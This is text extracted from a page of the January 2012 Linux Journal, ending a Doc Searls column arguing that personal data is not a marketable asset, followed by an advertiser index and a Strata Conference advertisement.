Advertiser Indexinitiative by the UK government(promising to return control of personaldata to citizens by the governmentand encouraging businesses to do thesame), nothing I’ve brought up sofar visits the possibility that personaldata—that you own and control—isnot by nature either a fungible asset orsomething that you would want to sellto anybody.In other words, if all of us actuallyhad full control of data about us,there might not be a market forpersonal data at all. There wouldsimply be all the other markets weknow—for goods and services we buyand sell. We might disclose some dataon a permitted-use basis, such as mostof us do every day using credit cards.But that’s not the same as selling dataas an “asset”.The only reason we’re talking aboutpersonal data as an “asset” is thatthe advertising marketplace—in whichwe are the product being sold, ratherthan the buyer or the seller—treatsit like that. Once we get real control,however, that market will be in realtrouble. Advertising will still be fine.Robotic bad manners will not.■Doc Searls is Senior Editor of Linux Journal. He is also a fellowwith the Berkman Center for Internet and Society at HarvardUniversity and the Center for Information Technology and Societyat UC Santa Barbara.Thank you as always for supporting ouradvertisers by buying their products!ADVERTISER URL PAGE #Emac, Inc.EmperorLinuxiXsystemsThe Linux Foundationhttp://www.emacinc.com29http://www.EmperorLinux.com21http://www.ixsystems.com7http://www.linuxfoundation.org69Logic Supply http://www.logicsupply.com 57, 77Lullabothttp://store.lullabot.com2Microway http://www.microway.com 3, 52, 53Opal Eventshttp://www.opalevents.org91O'Reilly Strata Conference http://strataconf.com/strata2012 124RackMountProSCALESilicon Mechanicshttp://www.rackmountpro.com15http://www.socallinuxexpo.org/scale10x103http://www.siliconmechanics.com61ATTENTION ADVERTISERSThe Linux Journal brand’s following hasgrown to a monthly readership nearlyone million strong. Encompassing themagazine, Web site, newsletters andmuch more, Linux Journal offers theideal content environment to help youreach your marketing objectives. Formore information, please visithttp://www.linuxjournal.com/advertising.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 123

Be at the forefront ofthe data revolution.February 28 – March 1, 2012Santa Clara, CAStrata offers the nuts-and-bolts of building a data-driven business.n See the latest tools and technologies you need to make data workn Find new ways to leverage data across industries and disciplinesn Understand the career opportunities for data professionalsn Tracks include: Data Science, Business & Industry, Visualization & Interface,Hadoop & Big Data, Policy & Privacy, and Domain Data.Strata Conference is for developers, data scientists, data analysts, and otherdata professionals.Registration is now open at strataconf.comSave 20% with code LINUXJR